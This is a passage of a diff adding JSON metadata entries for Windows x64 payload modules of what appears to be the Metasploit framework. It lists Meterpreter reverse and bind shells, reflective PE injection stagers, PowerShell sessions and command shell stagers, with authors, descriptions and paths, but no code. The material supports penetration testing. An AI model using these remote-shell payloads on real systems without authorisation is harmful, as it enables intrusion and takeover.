Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_bind_tcp": { + "name": "Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/windows/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_reverse_http": { + "name": "Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/windows/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_reverse_https": { + "name": "Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/windows/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_reverse_ipv6_tcp": { + "name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/windows/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_reverse_tcp": { + "name": "Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/windows/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/peinject/bind_ipv6_tcp": { + "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_windows/x64/peinject/bind_named_pipe": { + "name": "Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "UserExistsError" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/peinject/bind_tcp": { + "name": "Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_windows/x64/peinject/bind_tcp_rc4": { + "name": "Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_windows/x64/peinject/bind_tcp_uuid": { + "name": "Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/peinject/reverse_named_pipe": { + "name": "Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_windows/x64/peinject/reverse_tcp": { + "name": "Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/peinject/reverse_tcp_rc4": { + "name": "Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_windows/x64/peinject/reverse_tcp_uuid": { + "name": "Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/pingback_reverse_tcp": { + "name": "Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/windows/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Connect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/powershell_bind_tcp": { + "name": "Windows Interactive Powershell Session, Bind TCP", + "fullname": "payload/windows/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": 
"Listen for a connection and spawn an interactive powershell session", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/powershell_reverse_tcp": { + "name": "Windows Interactive Powershell Session, Reverse TCP", + "fullname": "payload/windows/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/powershell_reverse_tcp_ssl": { + "name": "Windows Interactive Powershell Session, Reverse TCP SSL", + "fullname": "payload/windows/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session over SSL", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "windows/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/shell/bind_ipv6_tcp": { + "name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/windows/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/shell/bind_ipv6_tcp_uuid": { + "name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/shell/bind_ipv6_tcp_uuid", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_windows/x64/shell/bind_named_pipe": { + "name": "Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "UserExistsError" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/shell/bind_tcp": { + "name": "Windows x64 
Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_windows/x64/shell/bind_tcp_rc4": { + "name": "Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + 
"payload_windows/x64/shell/bind_tcp_uuid": { + "name": "Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/shell/reverse_tcp": { + "name": "Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": 
"windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/shell/reverse_tcp_rc4": { + "name": "Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + 